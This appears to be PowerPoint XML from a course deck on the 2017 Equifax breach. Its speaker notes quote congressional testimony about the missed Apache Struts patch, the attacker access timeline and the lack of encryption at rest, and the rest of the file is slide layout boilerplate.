              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On March 8, 2017, the U.S. Department of Homeland Security, Computer Emergency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Readiness Team (“U.S. CERT”) sent Equifax and many others a notice of the need to patch a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>particular vulnerability in certain versions of software used by other businesses. &lt;snip&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On March 9, Equifax disseminated the U.S. CERT notification internally by email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requesting that applicable personnel responsible for an Apache Struts installation upgrade their</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>software. Consistent with Equifax’s patching policy, the Equifax security department required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that patching occur within a 48 hour time period. &lt;snip&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On March 15, Equifax’s information security department also ran scans that should have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>identified any systems that were vulnerable to the Apache Struts issue identified by U.S. CERT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfortunately, however, the scans did not identify the Apache Struts vulnerability. Equifax’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>efforts undertaken in March 2017 did not identify any versions of Apache Struts that were</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>subject to this vulnerability, and the vulnerability remained in an Equifax web application much</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>longer than it should have. &lt;snip&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on the investigation to date, it appears that the first date the attacker(s) accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sensitive information may have been on May 13, 2017. The company was not aware of that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access at the time. Between May 13 and July 30, there is evidence to suggest that the attacker(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>continued to access sensitive information, exploiting the same Apache Struts vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During that time, Equifax’s security tools did not detect this illegal access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35420450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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966817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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Equifax: Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On July 29, however, Equifax’s security department observed suspicious network traffic associated with the consumer dispute website (where consumers could investigate and contest issues with their credit reports). In response, the security department investigated and immediately blocked the suspicious traffic that was identified. The department continued to monitor network traffic and observed additional suspicious activity on July 30, 2017. In response, they took the web application completely offline that day. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The criminal hack was over, but the hard work to figure out the nature, scope, and impact of it was just beginning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/10/04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"We use many techniques to protect data—encryption, tokenization, masking, encryption in motion, encrypting at rest,” Smith said. “To be very specific, this data was not encrypted at rest.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Richard Smith was the CEO of Equifax. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://krebsonsecurity.com/2017/10/fear-not-you-too-are-a-cybercrime-victim/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/10/04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20160475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2388" cy="3600450"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Equifax Improvements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without having worked at Equifax we can conjecture what they looked like at the time of the breach. There is likely a long list of things that they could have done to prevent, or at the very least detect the compromise. They would be a natural target, and this would make that attack relatively likely to occur at some point. This would indicate that additional security controls should have been in place. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2660046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ans_course-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1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2398642" y="1921566"/>
            <a:ext cx="9184987" cy="2279373"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="5146469"/>
            <a:ext cx="11247437" cy="1003300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4200939" y="476250"/>
            <a:ext cx="7332249" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="64008" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5344265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ans_text_picture">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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655320" y="475840"/>
            <a:ext cx="10881360" cy="667160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="64008" rIns="91440" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191432" y="1593850"/>
            <a:ext cx="6163956" cy="440874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9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1593850"/>
            <a:ext cx="4240530" cy="440874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1420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sans_no-text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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655320" y="468361"/>
            <a:ext cx="10881360" cy="685800"/>
          </a:xfrm>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4713399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ans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4765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ans_course-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Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2398642" y="1921566"/>
            <a:ext cx="9184987" cy="2279373"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="5146469"/>
            <a:ext cx="11247437" cy="1003300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4200939" y="476250"/>
            <a:ext cx="7332249" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="64008" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r">
              <a:defRPr sz="1800" b="0" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626417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sans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08064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61F48FC-A1BB-2144-BE0E-87AAA343B81F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18/04/19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F33A07-5FB8-5543-BF6F-4F978396DAEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38016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sans_single-text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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bwMode="gray">
          <a:xfrm>
            <a:off x="655320" y="475840"/>
            <a:ext cx="10881360" cy="685799"/>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655320" y="1504335"/>
            <a:ext cx="10881360" cy="45425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40025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sans_single-text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="475840"/>
            <a:ext cx="11247120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B11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655320" y="475840"/>
            <a:ext cx="10881360" cy="685799"/>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655320" y="1504335"/>
            <a:ext cx="10881360" cy="45425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162207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ans_roadmap">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475488" y="475488"/>
            <a:ext cx="51816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Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Georgia" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
